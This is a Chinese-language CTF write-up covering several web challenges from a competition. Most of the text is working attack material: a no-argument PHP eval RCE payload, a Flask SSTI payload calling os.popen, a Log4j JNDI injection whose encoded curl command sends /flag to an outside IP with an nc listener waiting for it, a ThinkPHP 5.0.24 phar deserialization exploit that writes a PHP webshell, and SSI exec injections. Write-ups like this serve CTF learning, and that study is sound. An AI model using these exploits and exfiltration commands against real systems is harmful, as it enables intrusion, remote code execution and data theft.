前言 第一次被队友带飞,Tql
RCE_No_Para 无参数rce
<?php var_dump($_GET['code']); if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { var_dump($_GET['code']); if(!preg_match('/session|end|next|header|dir/i',$_GET['code'])){ eval($_GET['code']); }else{ die("Hacker!"); } }else{ show_source(__FILE__); } ?>
payload:
?code=eval(pos(array_reverse(current(get_defined_vars()))));&b=system('cat flag.php');
Flask
本地测试发现传入的参数都以 ? 为间隔
/admin?static.js? 绕过成功登录admin
name可控参数 测试存在ssti
payload:
url/admin?name={{(lipsum|attr(request.cookies.a)).os.popen(request.cookies.b).read()}}?.js? 设置cookie: a=__globals__;b=cat flag
Shiro?
存在Log4j 漏洞
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 150.158.181.145 //开启服务 curl http://1.116.110.61:4000 -F file=@/flag //base64 编码一次 url编码两次
payload:
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://150.158.181.145:1389/TomcatBypass/Command/Base64/Y3VybCBodHRwOi8vMS4xMTYuMTEwLjYxOjQwMDAgLUYgZmlsZT1AL2ZsYWc%253D}
开启监听 nc -lvnp 4000
Flag配送中心
powered by PHP 5.6.23 + fastcgi
尝试了未授权9000端口 扫一下ip发现其他端口尝试也失败
搜索相关漏洞 CVE-2016-5385
添加头部信息: Proxy: http://vps:port
服务器开启监听
tp(x)
thinkphp 5.0.24反序列化
phar反序列化
public function upload() { highlight_file(__FILE__); $FILES= $_FILES; foreach (array($_GET,$_POST) as $_request) { foreach ($_request as $_k => $_v) { ${$_k} = $this->func($_v); //$_request[$_k] = ${$_k}; } } $file = @$FILES['file']["tmp_name"]; $filename = @$FILES['file']["name"].'.jpg'; move_uploaded_file($file,$filename); if(preg_match("/ph/",$filename)){ unlink($filename); die("noPHP"); } } public function func(&$var){ if(is_array($var)){ foreach($var as $_k => $_v){ $var[$_k] = $this->func($_v); } }else{ $var = addslashes($var); } return $var; }
thinkphp5.0.24 rce被修复的版本
foreach (array($_GET,$_POST) as $_request) { foreach ($_request as $_k => $_v) { ${$_k} = $this->func($_v); //$_request[$_k] = ${$_k}; } }
首先这里存在变量覆盖 那么在这里
if(preg_match("/ph/",$filename)){ unlink($filename); die("noPHP"); }
就可以通过unlink触发phar协议,所以就是通过thinkphp5.0.24反序列化生成phar文件,然后变量覆盖触发链子
exp
<?php namespace think\process\pipes { class Windows { private $files = []; public function __construct($files) { $this->files = [$files]; } } } namespace think { abstract class Model{ protected $append = []; protected $error = null; public $parent; function __construct($output, $modelRelation) { $this->parent = $output; $this->append = array("xxx"=>"getError"); $this->error = $modelRelation; } } } namespace think\model{ use think\Model; class Pivot extends Model{ function __construct($output, $modelRelation) { parent::__construct($output, $modelRelation); } } } namespace think\model\relation{ class HasOne extends OneToOne { } } namespace think\model\relation { abstract class OneToOne { protected $selfRelation; protected $bindAttr = []; protected $query; function __construct($query) { $this->selfRelation = 0; $this->query = $query; //$query指向Query $this->bindAttr = ['xxx'];// $value值,作为call函数引用的第二变量 } } } namespace think\db { class Query { protected $model; function __construct($model) { $this->model = $model; //$this->model=> think\console\Output; } } } namespace think\console{ class Output{ private $handle; protected $styles; function __construct($handle) { $this->styles = ['getAttr']; $this->handle =$handle; //$handle->think\session\driver\Memcached } } } namespace think\session\driver { class Memcached { protected $handler; function __construct($handle) { $this->handler = $handle; //$handle->think\cache\driver\File } } } namespace think\cache\driver { class File { protected $options=null; protected $tag; function __construct(){ $this->options=[ 'expire' => 3600, 'cache_subdir' => false, 'prefix' => '', 'path' => 'php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../public/shell.php', 'data_compress' => false, ]; $this->tag = 'xxx'; } } } namespace { $Memcached = new think\session\driver\Memcached(new \think\cache\driver\File()); $Output = new think\console\Output($Memcached); $model = new think\db\Query($Output); $HasOne = new think\model\relation\HasOne($model); $window = new think\process\pipes\Windows(new think\model\Pivot($Output,$HasOne)); $phar = new Phar("phar.phar"); $phar->startBuffering(); $phar->setStub("<?php __HALT_COMPILER(); ?>"); $phar->setMetadata($window); $phar->addFromString("test.txt", "test"); $phar->stopBuffering(); }
生成phar文件后,改名字上传
upload(*)
一个上传题目,尝试绕过后缀失败,两解题目,回头学习思路
上传php,ini,htaccess 类型文件失败,畸形协议等绕过手段失败,上传shtml文件成功,尝试ssi注入
ls被ban
<!--#exec cmd="dir /" -->
发现flag
<!--#exec cmd="cut -b 1-100 /ffffff?llll11111aaaaa4444ggggg" --> <!--#exec cmd="tar cvf/var/www/html/upload/d7efaae655f6177619403045edc9ae32/2.tar / --exclude=/bin --exclude=app --exclude=home --exclude=root --exclude=run --exclude=lib --exclude=sys --exclude=tmp --exclude=usr --exclude=var --exclude=mnt --exclude=opt --exclude=etc --exclude=dev --exclude=boot --exclude=bin --exclude=proc --exclude=sbin --exclude=sys --exclude=mnt--exclude=media"-->
wp [长安战“疫”网络安全卫士守护赛官方WriteUp](长安战“疫”网络安全卫士守护赛官方WriteUp (qq.com) )
[长安”战役”ctf-wp](长安”战役”ctf-wp (qq.com) )
